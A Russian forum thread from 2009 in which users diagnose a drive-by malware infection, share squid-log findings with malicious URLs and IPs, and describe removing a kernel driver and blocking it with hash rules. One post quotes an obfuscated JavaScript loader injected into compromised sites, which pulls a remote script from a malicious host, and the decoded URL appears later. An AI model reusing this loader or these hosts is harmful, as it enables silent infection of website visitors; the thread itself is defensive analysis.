ПО File Downloader доступ в сеть запрещен

Здравствуйте !!!
На скрине видно, сегодня при попытке скачать торрент-файлик вот такая бяка встала на рабочем столе, и кстати блокировалла соединение с интернет, а именно DSL-Router DSL 2520U с компьтером.
Мне помогло восстановление системы Виндовс ХП Хоме-эдишн лицензия, откатился на 13 декабря и баннер исчез.
Что мне надо сделать чтоб окончательно удалить всякую бяку после этого баннера? Антивирусов в системе нет, был Касперский лицензия но в начале декабря лицензия кончилась, а продлевать нет смысла от этого каспера.
На данный момент комп не тормозит, программы нормально запускаются, пишу с этого-же компа.
[URL="http://radikal.ru/F/i001.radikal.ru/0912/a6/76f44ae42ce6.jpg.html"][IMG]http://i001.radikal.ru/0912/a6/76f44ae42ce6t.jpg[/IMG][/URL]

Вам поговорить или решить проблему?

Да вобщем проблема решена, но есть другая на почту не пришло письмо активации аккаунта, через "обратную связь" написал а в ответ тишина, личные данные нельзя редактировать.

Тогда переедем. Пока сюда, дальше администрация решит, куда лучше.

Ну вот и письмо дошло; Отправлено 14 декабря 2009 в 16:15, получено в 21:25

За последнюю неделю зарегистрировал 6 фактов заражения зловредом aekgoprn.sys в своей организации. Поскольку лечить эту дрянь надоело, решил разобраться откуда она берется и заблокировать эти источники.
Последний инцидент был вчера по словам пользователя вирус запустился после похода на сайт.
Сегодня покурил логи squid и нашел откуда прицепилась зараза.
Итак первое что стоит посмотреть это :http:xandora.security.net.my/?p=1406[/URL] (небольшое описание которое дает хоть какую-нибудь информацию)

В логах нашел следующие источники этой заразы:
:http:forhomessale.ru/new/controller.php? - DIRECT/91.215.156.74 text/html
:http:foresaleonline.ru/ololo.php - DIRECT/81.89.102.178 text/html

Сам сайт :http:forhomessale.ru/ пуст, там просто стоит какой-то WEB-сервер для (вполне возможно для распространения заразы).

Еще зарегистриовал запрос по адресу :http:kindpea.ru/good/receiver/online, этот узел на момент написания поста не доступен, при попытке доступа говорит Connection Refused. Что это за узел сказать трудно но в "небольшом описании" он присутствует в разделе "Malware Traffic – DNS", т.е. похоже зловред после установке шлет туда DNS запросы (или для атаки или для своей работы).

controller.php имеет размер 325 640 байт, что из себя представлет не знаю, на приложение windows не похоже.

Ну полный фишиш. Еще почитал логи и нашел очень интересный сайт.

[COLOR="Red"]ВНИМАНИЕ!!! Не заходите на нижеуказанный сайт ни при каких обстоятельствах с использованием IE и Firefox, это может принести вред вашему компьютеру.[/COLOR]
=================
h_t_t_p://ridjey.ru
=================

Если зайти на этот сайт будет установлен вирус без каких-либо предупреждений, уведомлений и предложений, он просто будет установлен и нарушит нормальную работу Win.

Посмотрев контент нашел вот что:

[CODE]*GNU GPL*/
try{window.onload = function()
{
var D6rxya3l44pnunx = document.createElement('script');
D6rxya3l44pnunx.setAttribute('type', 'text/javascript');
D6rxya3l44pnunx.setAttribute('id', 'myscript1');
D6rxya3l44pnunx.setAttribute('src', '
[COLOR="Red"] ========Указаный ниже блок кода пишется в одну строку=====[/COLOR]
h#$t(&$!t(!p(:&)/#&/(g#(@o$#@o#g(l^&^$$e!(-&c#!(o!m@-$&^d^@!o!((@).
(^i!#()n)!s##!i@!(^g#h&)@&t#e&#x#&)^p#)r&!$e&^!s###&s$!a!))i@(#).
!#c@$o$@!m(.($$d&^)t#)$)(i@$(b@!^#l&&$o&!g!@-&(^#c#(&o##&m$!)#.
#g#!^r#!e)$^#a^@#)t)$(^s)()a)l^$e)c^!&e#!^n$)t(#e^r$$&).)(!$$r^@u):
(&^8@)0$@)8$0$)/!##g&!(s@#m#a@r$(e)^n!@a@.#)c@o)^m##^/&#@g^$s@)#$m^#a$&r&!&e(&$n(&^a!)#^.
&c)o@#&m(/#$#$m@($!&e$!#t&^!r)!^@o)$l##y&#(r!^^i@#@!c(s$)^$).$!(c(o^^&#m)!^$/)!&q)
@$i!&&d&^(#)i^a^&@n#.!^@c($$o#@@m$!/(^g^o!&^(o!&(^@g()l^#&e((!!.@!c&$)o))
(#^m#/$'.replace(/\$|\^|\)|&|\(|\!|#|@/ig, ''));
[COLOR="Red"]======================================================[/COLOR]
D6rxya3l44pnunx.setAttribute('defer', 'defer');
document.body.appendChild(D6rxya3l44pnunx);
}
}
catch(e) {}[/CODE]

Видимо вот это JavaScript-животное и цепляет заразу без спроса (хотя за достоверность не ручаюсь, дебаг не делал).

Как возможный вариант источника заразы - подхват контента с баннерных систем. Например в HTML-коде указанного выше сайта я нашел подгрузку файлика "autocontext2.js" с autocontext.begun.ru. Этот скрипт генерирует контекстную рекламу на сайте и теоретически если запулить на бегун баннер хитрого содержания можно заставить браузер выполнить произвольный код. Если такое возможно, то под угрозой очень большое количество пользователей.

[size="1"][color="#666686"][B][I]Добавлено через 27 минут[/I][/B][/color][/size]

Кажется нашел основной файл вируса. Называется он applicationdata.bin и расположен по адресу 208.101.27.44/applicationdata.bin. Имеет размер 698041 байт и представляет из себя драйвер KernelMode который в систему устаналивается как сервис под именем bcebq и хранится этот драйвер по адресу c:\windows\system32\bcebq.sys Этот драйвер невозможно выгрузить или удалить. Для удаления мне пришлось загрузить консоль восстановления и удалить файлик из коммандной строки. Сложность удаления из под работающей винды в том, что при вызове контекстного меню "свойства" для этого файла не удается увидеть вкладку разрешения (хотел просто запретить для системы чтение этого файла), тоже самое касается ключа реестра для этого драйвера, контекстное меню разрешений открывает пустое окно с надписью "Ошибка доступа к информации о безопасности".
Этот драйвер похоже сильно хозяйничает в ядре операционной системе если может сделать такое.

to fksm:
А если изменить натройки безопасности IE со стандартных на нормальные, то автоматическая установка этого "ПО" возможна?

Если честно не пробовал, но наверное возможно. Я сейчас посмотрел настройки по-умолчанию и для JavaScript там все разрешено без спросу, но есть варианты "запретить" и "предложить". Думаю если поставить хотя бы вариант "Предложить" так просто гадость не прицепится. Но с другой стороны не известно как будут на такой уровень безопасности реагировать другие обычные сайты. Например тот-же гугл со своим Ajax-ом в строке поиска может либо не запуститься, либо замучает вопросами "можно/нельзя". Надо попробовать.

Вообще-то, обычно подобные вещи (Windows Заблокирован, Digital Access, Ufast и т.п.) бывают на видеосайтах, обычно такие сайты не имеют URL (только IP).

[QUOTE='fksm;538253']Видимо вот это [B]JavaScript[/B]-животное и цепляет заразу без спроса [/QUOTE]
Точно вспомнил, перед тем как загрузить торрент-файлик этот JavaScript устанавливался у меня на IE-8 без какого либо запроса.

А вот и подтверждение: [url]http://virusinfo.info/showthread.php?t=64189[/url]

Поиск в гугле по слову Hva23p3hnyirlpv7 (это слово взято из прицепленного вирусом кода) выдает 434 узла, и все они заражены. Довольно продвинутый способ распространения заразы, я такого еще не встречал.

Итак что делать чтобы описанный вирус не запустился?

1. Делаем пуск - выполнить, пишем mmc жмем ок
2. В открывшейся консоли жмем "Консоль - добавить или удалить оснастку..."
3. В диалоговом окне жмем кнопку "Добавить" и добавляем оснастку "Редактор групповой политики".
4. Переходим по дереву Конфигурация компьютера - Конфигурация Windows - Параметры безопасности - Политики ограниченного использования программ.
5. При первом входе в этот элемент нужно создать новые политики используя пункт меню "Действие".
6. Далее заходим в "дополнительные правила" и нажав вправом окне правой кнопкой мыши "создать правила для хеша" вводим данные о блокируемом файле:
а) поле хешируемый файл задается в значение af479a1a09db648b9445a0c8c0756c05:697856:32771
б) поле информация файла здается в значение applicationdata.bin, 682 КБ
в) безопасность - не разрешено

Аналогичным образом блокируем второй файл:
а) 1d6596b0b9011c24163b4136be189a27:15360:32771
б) ~TM2FF.tmp, 16 КБ
в) не разрешно

Дальше можно закрыть mmc, на предложение сохранить консоль можно нажать нет, этот ответ не повлияет на сделанные операции, т.к. они применяются сразу же после ввода данных, а сохранение консоли всего лишь сохраняет набор созданных оснасток.

[QUOTE='fksm;538253'].replace(/\$|\^|\)|&|\(|\!|#|@/ig, '')[/QUOTE]
если в указанном выше куске кода выполнить этот replace
то получиться примерно следующее
_http://mybrowserbar-com.samsung.com.nasa-gov.egreatsale.ru:8080/megavideo.com/megavideo.com/laredoute.fr/bild.de/google.com
вот туда он или чета качает или куда дальше отправляет.
кстати НОД сразу ахтунг объявляет на этот адрес.